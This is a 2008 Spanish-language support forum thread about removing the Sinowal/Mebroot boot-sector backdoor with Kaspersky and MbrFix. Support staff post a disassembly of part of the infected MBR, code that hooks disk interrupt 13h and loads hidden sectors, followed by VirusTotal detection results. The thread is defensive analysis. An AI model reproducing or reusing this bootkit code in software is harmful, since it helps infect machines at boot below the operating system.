Backdoor.Win32.Sinowal.a ???? (SOLUCIONADO)

[msc hotline sat]

Has lo que quieras, nosotros ya te hemos dicho lo que sugerimos.



Tras hacerlo informanos del resultado, gracias



saludos



ms, 19-03-2008

[NoSeNa]

Hola,



Hoy me he puesto manos a la Obra.



1º he ejecutado el Kaspersky y lo he hecho con todas las unidades encendidas, En principio me ha detectado en el Disco Duro Externo el Troyano, y parece ser que lo he ELIMINADO, Me queda por hacer la prueba con el arranque del PC.



2º He puesto el Archivo MRFIX.exe en C: despues de hacer copia del MBRFIX con:



C:\> MbrFix /drive 0 savembr Backup_MBR_0.bin



C:\> MbrFix /drive 1 savembr Backup_MBR_1.bin



He Ejecutado



C:\> MbrFix /drive [b]0[/b] fixmbr /yes



Y nada seguía estando. He ejecutado



C:\> MbrFix /drive [b]1[/b] fixmbr /yes



Y parece que está [b]SOLUCIONADO[/b], pero al entrar en C: ha reconocido el [b]Backup_MBR_1.bin[/b] y me lo ELIMINADO como troyano.



He reiniciado el PC y esta vez parece ser que OK.



Haré la prueba con el DR5 Encendido. Y os sigo informando



Gracias y Saludos

[NoSeNa]

Hola de nuevo,



Parece ser que está SOLUCIONADO, No me detecta el antivirus en el ARRANQUE del PC nada.



Saludos.

[msc hotline sat]

Pues lo celebramos, aunque es una pena que no haya hecho una copia del MBR infectado, para analizarlo, como le pediamos:



"[b][i]Por esto te pedimos copia del fichero "segu" para poder analizar de qué se trata, y aparte de resguardar una copia del MBR infectado, nos servirá para ver lo que hace, modifica y demas, por si hemos de restaurar alguna otra cosa.[/i][/b]"



En fin, otra vez será, de momento se da el Tema por solucionado y lo cerramos



saludos



ms, 24-03-2008







> NOTA: Releyendo el tema al hacer referencia al mismo en otro, rectifico lo indicado de que no hizo copia del MBR, si que la hizo pero se eliminó al ser detectada en siguiente reinicio, el antivirus se la eliminó al detectar cadenas del virus :


[quote]2º He puesto el Archivo MRFIX.exe en C: despues de hacer copia del MBRFIX con:



C:\> MbrFix /drive 0 savembr Backup_MBR_0.bin



C:\> MbrFix /drive 1 savembr Backup_MBR_1.bin[/quote]

pero luego:


[quote]Y parece que está SOLUCIONADO, pero al entrar en C: ha reconocido el Backup_MBR_1.bin y me lo ELIMINADO como troyano.[/quote]


Queda aclarado en desagravio de lo que se le decia al usuario :oops: ms.

[msc hotline sat]

El forero NoSeNa nos ha enviado el fichero correspondiente al MBR infectado, el cual desemsamblado vemos el siguiente codigo de assembler:


[quote]000000 FA cli -

000001 33DB xor bx,bx _

000003 8ED3 mov ss,bx _

000005 368926FE7B mov ss:[7BFE],sp _

00000A BCFE7B mov sp,7BFE _

00000D 1E push ds _

00000E 66 db 66 _

00000F ·60 pusha _

000010 FC cld _

000011 8EDB mov ds,bx _

000013 BE1304 mov si,413 _

000016 832C02 sub word ptr [si],+2 _

000019 AD lodsw _

00001A ·C1E006 shl ax,6 _

00001D 8EC0 mov es,ax _

00001F BE007C mov si,7C00 _

000022 33FF xor di,di _

000024 B90001 mov cx,100 _

000027 F3A5 repz movsw _

000029 B80202 mov ax,202 _

00002C B13D mov cl,3D ;"=" -

00002E BA8000 mov dx,80 -

000031 8BDF mov bx,di _

000033 CD13 int 13 ;BIOS Fixed disk/FDD Serv_

000035 33DB xor bx,bx _

000037 66 db 66 _

000038 8B474C mov ax,[bx+4C] _

00003B 66 db 66 _

00003C 26A37300 mov es:[73],ax _

000040 C7474C6600 mov word ptr [bx+4C],66 _

000045 8C474E mov [bx+4E],es _

000048 06 push es _

000049 ·684D00 push 4D _

00004C CB retf _

00004D FB sti _

00004E 8EC3 mov es,bx _

000050 B80102 mov ax,201 _

000053 B93F00 mov cx,3F _

000056 BA8000 mov dx,80 _

000059 B77C mov bh,7C ;"|" _

00005B CD13 int 13 ;BIOS Fixed disk/FDD Serv_

00005D 66 db 66 -

00005E ·61 popa -

00005F 1F pop ds _

000060 5C pop sp _

000061 EA007C0000 jmp 0:7C00 _

000066 9C pushf _

000067 80FC42 cmp ah,42 ;"B" _

00006A 740B jz 000077 ;(1) _

00006C 80FC02 cmp ah,2 _

00006F 7406 jz 000077 ;(2) _

000071 9D popf _

000072 EA00000000 jmp 0:0 _

000077 2E88269000 mov cs:[90],ah _

00007C 9D popf _

00007D 9C pushf _

00007E 2EFF1E7300 call far cs:[73] _

000083 0F82 ??? _

000085 9D popf _

000086 009CFA06 add [si+6FA],bl _

00008A 66 db 66 _

00008B ·60 pusha _

00008C FC cld -

00008D B400 mov ah,0 -

00008F B500 mov ch,0 _

000091 80FD42 cmp ch,42 ;"B" _

000094 7504 jnz 00009A ;(1) _

000096 AD lodsw _

000097 AD lodsw _

000098 C41C les bx,[si] _

00009A 85C0 test ax,ax _

00009C 7501 jnz 00009F ;(2) _

00009E 40 inc ax _

00009F 8BC8 mov cx,ax _

0000A1 B08B mov al,8B _

0000A3 ·C1E109 shl cx,9 _

0000A6 8BFB mov di,bx _

0000A8 ·60 pusha _

0000A9 F2AE repnz scasb _

0000AB 7547 jnz 0000F4 ;(3) _

0000AD 66 db 66 _

0000AE 26813DF085 cmp word ptr es:[di],85F0 _

0000B3 F67475 div [si+75] _

0000B6 F226 dw -

0000B8 817D05803D cmp word ptr [di+5],3D80 -

0000BD 75EA jnz 0000A9 ;(1) _

0000BF 268A4504 mov al,es:[di+4] _

0000C3 3C21 cmp al,21 ;"!" _

0000C5 7404 jz 0000CB ;(2) _

0000C7 3C22 cmp al,22 ;""" _

0000C9 75DE jnz 0000A9 ;(3) _

0000CB BE0B02 mov si,20B _

0000CE 2E803C00 cmp byte ptr cs:[si],0 _

0000D2 7520 jnz 0000F4 ;(4) _

0000D4 2E8804 mov cs:[si],al _

0000D7 26C745FFFF15 mov word ptr es:[di-1],15FF _

0000DD 66 db 66 _

0000DE 8CC8 mov ax,cs _

0000E0 66 db 66 _

0000E1 ·C1E004 shl ax,4 _

0000E4 050002 add ax,200 _

0000E7 66 db 66 _

0000E8 2EA3FC01 mov cs:[1FC],ax _

0000EC 2D0400 sub ax,4 _

0000EF 66 db 66 -

0000F0 26894501 mov es:[di+1],ax -

0000F4 ·61 popa _

0000F5 B083 mov al,83 _

0000F7 F2AE repnz scasb _

0000F9 7525 jnz 000120 ;(1) _

0000FB 66 db 66 _

0000FC 26813DC402 cmp word ptr es:[di],2C4 _

000101 E90075 jmp 007604 _

000104 F266 repnz db 66 _

000106 26817D0400E9 cmp word ptr es:[di+4],0E900 _

00010C FD std _

00010D FF75E7 push [di-19] _

000110 66 db 66 _

000111 26C745FC9090 mov word ptr es:[di-4],9090 _

000117 90 nop _

000118 8326836506 and word ptr [6583],+6 _

00011D 00EB add bl,ch _

00011F D7 xlat _

000120 66 db 66 _

000121 ·61 popa _

000122 07 pop es -

000123 9D popf -

000124 CA0200 retf 2 _[/quote]

Lo publicamos porque solo es una tercera parte del código, pues ya se ve que sigue en los siguientes 1024 del sector 61 y hace una llamada al 63, dado que en el 61 y 62 por lo visto tiene la continuacion de dicho virus y en el 63 tiene una copia del MBR original.



Voy a subir al VirusTotal el fichero recibido a ver como lo detectan y lo poteso a continuacion:


[quote]File backup_MBR_1.bin received on 03.27.2008 16:10:17 (CET)

Current status: finished



Result: 9/32 (28.12%)

Compact Print results

Antivirus Version Last Update Result

AhnLab-V3 2008.3.26.0 2008.03.27 -

AntiVir 7.6.0.75 2008.03.27 -

Authentium 4.93.8 2008.03.27 could be an image file of a boot sector virus

Avast 4.7.1098.0 2008.03.26 -

AVG 7.5.0.516 2008.03.27 PSW.Sinowal.C.boot

BitDefender 7.2 2008.03.27 -

CAT-QuickHeal 9.50 2008.03.26 -

ClamAV 0.92.1 2008.03.27 -

DrWeb 4.44.0.09170 2008.03.27 BackDoor.MaosBoot

eSafe 7.0.15.0 2008.03.18 -

eTrust-Vet 31.3.5648 2008.03.27 -

Ewido 4.0 2008.03.27 -

FileAdvisor 1 2008.03.27 -

Fortinet 3.14.0.0 2008.03.27 -

F-Prot 4.4.2.54 2008.03.27 -

F-Secure 6.70.13260.0 2008.03.27 Backdoor.Win32.Sinowal.a

Ikarus T3.1.1.20 2008.03.27 -

Kaspersky 7.0.0.125 2008.03.27 Backdoor.Win32.Sinowal.a

McAfee 5260 2008.03.26 -

Microsoft 1.3301 2008.03.27 Trojan:DOS/Sinowal.A

NOD32v2 2978 2008.03.27 -

Norman 5.80.02 2008.03.26 -

Panda 9.0.0.4 2008.03.26 -

Prevx1 V2 2008.03.27 -

Rising 20.37.32.00 2008.03.27 Unknown Boot Virus

Sophos 4.27.0 2008.03.27 Troj/Mbroot-A

Sunbelt 3.0.978.0 2008.03.18 -

Symantec 10 2008.03.27 -

TheHacker 6.2.92.256 2008.03.27 -

VBA32 3.12.6.3 2008.03.25 suspected of Unknown.BootVirus

VirusBuster 4.3.26:9 2008.03.26 -

Webwasher-Gateway 6.6.2 2008.03.27 -

Additional information

Tamano archivo: 512 bytes

MD5: 431c9860ac04b98ff7178b56bed57a91

SHA1: ddf8e296941c3c9894646e2d963857c97a523bfc

PEiD: - [/quote]

Aunque no sea muy ortodoxo lo que hemos hecho, y que puede que sea detectado ahora por lo que lo controlan sobre esta tercera parte del virus , ya vemos que los nombres elegidos son Sinowal, MaosBoot, BootVirus y MbRoot siendo la mayoria el de Sinowal.



Sirva este complemento como informacion de lo mas significativo al respecto.



Saludos



ms, 27-03-2008